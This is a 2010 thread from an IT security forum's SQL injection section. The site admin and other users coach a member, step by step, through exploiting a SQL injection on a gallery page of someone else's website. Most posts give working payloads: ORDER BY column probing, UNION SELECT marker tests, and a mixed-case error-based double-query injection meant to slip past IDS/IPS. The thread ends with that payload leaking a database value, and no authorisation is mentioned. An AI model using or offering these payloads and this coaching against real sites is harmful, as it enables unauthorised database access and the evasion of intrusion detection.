 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
What if the webpage doesn't disclose number of columns |
 |
 Posted: Thu Sep 16, 2010 6:59 am |
 |
|
| RubberDoll |
| Active user |
 |
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
 |
|
 |
|
Hello waraxe and experts
please forgive my lack of knowledge and don't bash me : )
usually at this step I just give up, but this time I really want to get on with this issue, and learn for further experience
I have a webpage which responds to the simplest test as such
| Code: | | http://site.com/guests_galleries.php?kat=1' |
responding with
| Quote: | | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC LIMIT 0, 12' at line 1 |
But then when I try the next test
| Code: | | http://site.com/guests_galleries.php?kat=1+order+by+2-- |
it responds with
| Quote: | | Unknown column '2' in 'order clause' |
I'm positive there are steps to take when such an error displays, I just don't have a clue what they are.
I can't search or google either because I don't know what I'm looking for 
Please guide me : )
Thanks in advance! |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 17, 2010 8:42 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Try:
| Code: |
http://site.com/guests_galleries.php?kat=1+order+by+1--
|
If you get no error, then it's one column only.
Next test:
| Code: |
http://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--
|
Try to find string "11223344" in html source code. |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 17, 2010 11:42 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Hi waraxe and thank you for your time
well I thought it must have more than one column, because the initial error mentions | Quote: | | near '' ORDER BY galleries_added DESC' |
I forgot to mention that
://site.com/guests_galleries.php?kat=1+order+by+1--
results in a perfect original page..
I also discovered that by incrementing
://site.com/guests_galleries.php?kat=1+order+by+2--
to
://site.com/guests_galleries.php?kat=1+order+by+26--
that the error only appears once
| Quote: | | Unknown column '26' in 'order clause' |
etc, while
://site.com/guests_galleries.php?kat=1+order+by+27--
and higher, results in double display of the error
| Quote: | | Unknown column '27' in 'order clause'Unknown column '27' in 'order clause' |
so I'm thinking maybe there could be 26 columns in this table?
but trying
://site.com/guests_galleries.php?kat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
I get blank part of the page where content is normaly
same for trying ://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--
I've checked the source in all cases including the last as you suggested and there's nothing there.. (no 11223344 in our case)
instead, it shows this html code in the source
| Code: | <p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p> |
I hope I've provided all neccessary info :)
Thanks again |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 17, 2010 1:48 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
You must try to get working data feedback.
Try:
| Code: | http://site.com/guests_galleries.php?kat=-1+union+all+select+1122331,1122332,1122333,1122334,1122335,1122336,1122337,1122338,1122339,11223310,11223311,11223312,11223313,11223314,11223315,11223316,11223317,11223318,11223319,11223320,11223321,11223322,11223323,11223324,11223325,11223326--
|
and look for specific strings.
If you are unable to get normal data feedback, then exploitation may still be possible - there are blind injection methods for that, for example:
http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 17, 2010 3:52 pm |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Thanks a lot waraxe
unfortunately this yielded the same <p> ;;</p> stuff, so I'll turn to reading in hope to see the light, although it might prove very difficult since my scripting language skills are zero.
And thank you for the link :) |
|
|
|
|
|
Re: What if the webpage doesn't disclose number of columns |
|
| Posted: Sat Sep 18, 2010 2:45 am |
|
|
| Plitvix |
| Beginner |
|
|
| Joined: Sep 18, 2010 |
| Posts: 1 |
|
|
|
|
|
|
|
Maybe you can try some double query injections like
| Code: | | aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- - |
It will probably work. |
|
|
|
|
|
Re: What if the webpage doesn't disclose number of columns |
|
| Posted: Mon Sep 20, 2010 7:16 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Hello Plitvix
unfortunately not but thank you
btw, why is the mixure of uppercase and lowercase letters?
| Plitvix wrote: | Maybe you can try some double query injections like
| Code: | | aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- - |
It will probably work. |
|
|
|
|
|
| Posted: Mon Sep 20, 2010 8:58 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Mixed case letters may let pass undetected by IDS/IPS sometimes.
Try this:
| Code: |
http://site.com/guests_galleries.php?kat=1+aND(SeLEct+1+FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct+CoNCaT(DaTABasE())+FrOM+inFoRMAtioN_ScHEmA.TabLEs+LiMiT+0,1),fLOOr(Rand(0)*2))x+FrOM+inFoRMAtioN_ScHEmA.TabLEs+GrOUP+bY+x)a)
|
Do you get any SQL error messages? |
|
|
|
|
| Posted: Wed Sep 29, 2010 9:48 am |
|
|
| RubberDoll |
| Active user |
|
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Hello again waraxe, thank you for keeping still an eye on this topic :)
yes, if fact I do
well I get an error. whether its a sql related error, I'm not sure anymore
| Code: |
Duplicate entry 'kylacolepre1' for key 1Duplicate entry 'kylacolepre1' for key 1 |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 112
Members: 0
Total: 112
